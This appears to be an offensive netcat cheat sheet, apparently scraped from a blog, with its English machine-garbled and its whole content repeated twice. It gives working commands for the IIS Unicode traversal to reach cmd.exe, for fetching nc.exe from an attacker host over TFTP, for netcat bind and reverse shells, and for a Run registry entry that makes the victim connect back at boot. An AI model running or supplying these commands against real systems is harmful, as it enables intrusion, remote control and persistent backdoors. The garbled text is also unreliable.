Port scanning 1 through 200:
nc -v -w2 -z 192.168.0.2 1-200
-------------------------------
Banner grabbing alongside nc:
nc -v -n 192.168.0.2 80
------------------------------
IIS Unicode File Traversal:
http://192.168.0.2/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\
Now nosotros desire to upload nc.exe to the vulnerable IIS server:
http://192.168.0.2/scripts/..%255c../winnt/system32/cmd.exe?/c+TFTP+-i+192.168.1.9+GET+nc.exe
nosotros used:
tftp -I 192.168.1.9 GET nc.exe
is transformed into:
http://<exploit URL>/c+TFTP+-i+192.168.1.9+GET+nc.exe
equally a TFTP server nosotros tin use: TFTPD32 yesteryear Ph. Jounin
---------------------------------
Netcat equally a backdoor:
instantly nosotros accept nc.exe on the server in addition to nosotros desire to practise a backdoor to cash inwards one's chips a remote shell.
nc -L -p 1001 -d -e cmd.exe
-L -> practise non closed in addition to hold off for connections.
-p -> port
-d -> detach from the procedure nosotros desire it to run.
-e -> what programme to operate 1 time the port is connected to (cmd.exe ).
If nosotros non desire to convert this ascendancy for Unicode URL use, it volition await similar this:
http://<exploir URL>/c+nc+-L+-p+1001+-d+-e+cmd.exe
ex:
nc -v 192.168.80.14 80
GET http://192.168.80.14/scripts/..%255c../winnt/system32/cmd.exe?/c+nc.exe+-L+-p+1001+-d+-e+cmd.exe
------------------------------------------------------
Transferring File alongside nc.exe:
We desire to transfer a file called hack.txt to the IIS Server in addition to nosotros don't desire to role TFTP .We tin role nc.exe to transfer the file.
To have a file named hack.txt on the finish organisation kickoff Netcat on the IIS server alongside the next command:
nc -l -p 1234>hack.txt
On our origin organisation ( the attacking calculator ) nosotros post a file named hack.txt to the IIS car alongside the following
command:
nc finish 1234<hack.txt
#################
Server side: nc -L -p [PORT] -e cmd.exe
Client side: nc -vv [IP] [PORT]
On the victim computer.
reg add together hklm\software\microsoft\windows\currentversion\run /v capture /t reg_sz /d "nc 192.168.1.68 10001 -d -e cmd.exe"
Remember 192.168.1.68 is the assailant machine.
And on the assailant car but listen.
nc -vv -l -p 10001
You should head on your machine, in addition to when the victim boots up, nc volition connect to you, in addition to volition spawn a contrary trounce to you.
The ascendancy prompt popup should come upwardly up for a minute in addition to disapper.
Oh you lot should set nc inwards the system32 directory, hence you lot don't accept to specify where nc is located. All you lot accept to practise in addition to then is type nc inwards whatever directory.
-l waits for connection.
-p port to head on.
-d detach from the process.
-e which programme to execute.
-w timeout for connection.
-v verbose [use twice to endure to a greater extent than verbose]
Now nosotros tin meet that the file has been transferred to the target system, via port 1234.
###############
Netcat fun tricks:
Data Transfer (Pull):
server: nc -l -p [port] < [filename]
client: nc [server ip] [server port] > [filename]
Data Transfer (Push):
server: nc -l -p [port] > [filename]
client: nc [server ip] [server port] < [filename]
Backdoors:
unix: nc -l -p [port] -e /bin/sh
windows: nc -l -p [port] -e cmd.exe
Persistant Backdoor:
while [ 1 ]; nc -l -p [port] -e /bin/sh; done
Reverse Shell
server (attacker): nc -l -p [port]
client (victim): nc [server ip] [server port] -e [shell]
Backdoor Client:
nc [server ip] [port]
Traffic Relay on Linux:
mknod backpipe p
nc -l -p [incoming port] 0backpipe
Traffic Replay:
nc [targetip] [port] < [filename]
reg add together hklm\software\microsoft\windows\currentversion\run /v capture /t reg_sz /d "c:\tmp\nc.exe -l -p 6666"
##############
nc -v -w2 -z 192.168.0.2 1-200
-------------------------------
Banner grabbing alongside nc:
nc -v -n 192.168.0.2 80
------------------------------
IIS Unicode File Traversal:
http://192.168.0.2/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\
Now nosotros desire to upload nc.exe to the vulnerable IIS server:
http://192.168.0.2/scripts/..%255c../winnt/system32/cmd.exe?/c+TFTP+-i+192.168.1.9+GET+nc.exe
nosotros used:
tftp -I 192.168.1.9 GET nc.exe
is transformed into:
http://<exploit URL>/c+TFTP+-i+192.168.1.9+GET+nc.exe
equally a TFTP server nosotros tin use: TFTPD32 yesteryear Ph. Jounin
---------------------------------
Netcat equally a backdoor:
instantly nosotros accept nc.exe on the server in addition to nosotros desire to practise a backdoor to cash inwards one's chips a remote shell.
nc -L -p 1001 -d -e cmd.exe
-L -> practise non closed in addition to hold off for connections.
-p -> port
-d -> detach from the procedure nosotros desire it to run.
-e -> what programme to operate 1 time the port is connected to (cmd.exe ).
If nosotros non desire to convert this ascendancy for Unicode URL use, it volition await similar this:
http://<exploir URL>/c+nc+-L+-p+1001+-d+-e+cmd.exe
ex:
nc -v 192.168.80.14 80
GET http://192.168.80.14/scripts/..%255c../winnt/system32/cmd.exe?/c+nc.exe+-L+-p+1001+-d+-e+cmd.exe
------------------------------------------------------
Transferring File alongside nc.exe:
We desire to transfer a file called hack.txt to the IIS Server in addition to nosotros don't desire to role TFTP .We tin role nc.exe to transfer the file.
To have a file named hack.txt on the finish organisation kickoff Netcat on the IIS server alongside the next command:
nc -l -p 1234>hack.txt
On our origin organisation ( the attacking calculator ) nosotros post a file named hack.txt to the IIS car alongside the following
command:
nc finish 1234<hack.txt
#################
Server side: nc -L -p [PORT] -e cmd.exe
Client side: nc -vv [IP] [PORT]
On the victim computer.
reg add together hklm\software\microsoft\windows\currentversion\run /v capture /t reg_sz /d "nc 192.168.1.68 10001 -d -e cmd.exe"
Remember 192.168.1.68 is the assailant machine.
And on the assailant car but listen.
nc -vv -l -p 10001
You should head on your machine, in addition to when the victim boots up, nc volition connect to you, in addition to volition spawn a contrary trounce to you.
The ascendancy prompt popup should come upwardly up for a minute in addition to disapper.
Oh you lot should set nc inwards the system32 directory, hence you lot don't accept to specify where nc is located. All you lot accept to practise in addition to then is type nc inwards whatever directory.
-l waits for connection.
-p port to head on.
-d detach from the process.
-e which programme to execute.
-w timeout for connection.
-v verbose [use twice to endure to a greater extent than verbose]
Now nosotros tin meet that the file has been transferred to the target system, via port 1234.
###############
Netcat fun tricks:
Data Transfer (Pull):
server: nc -l -p [port] < [filename]
client: nc [server ip] [server port] > [filename]
Data Transfer (Push):
server: nc -l -p [port] > [filename]
client: nc [server ip] [server port] < [filename]
Backdoors:
unix: nc -l -p [port] -e /bin/sh
windows: nc -l -p [port] -e cmd.exe
Persistant Backdoor:
while [ 1 ]; nc -l -p [port] -e /bin/sh; done
Reverse Shell
server (attacker): nc -l -p [port]
client (victim): nc [server ip] [server port] -e [shell]
Backdoor Client:
nc [server ip] [port]
Traffic Relay on Linux:
mknod backpipe p
nc -l -p [incoming port] 0backpipe
Traffic Replay:
nc [targetip] [port] < [filename]
reg add together hklm\software\microsoft\windows\currentversion\run /v capture /t reg_sz /d "c:\tmp\nc.exe -l -p 6666"
##############
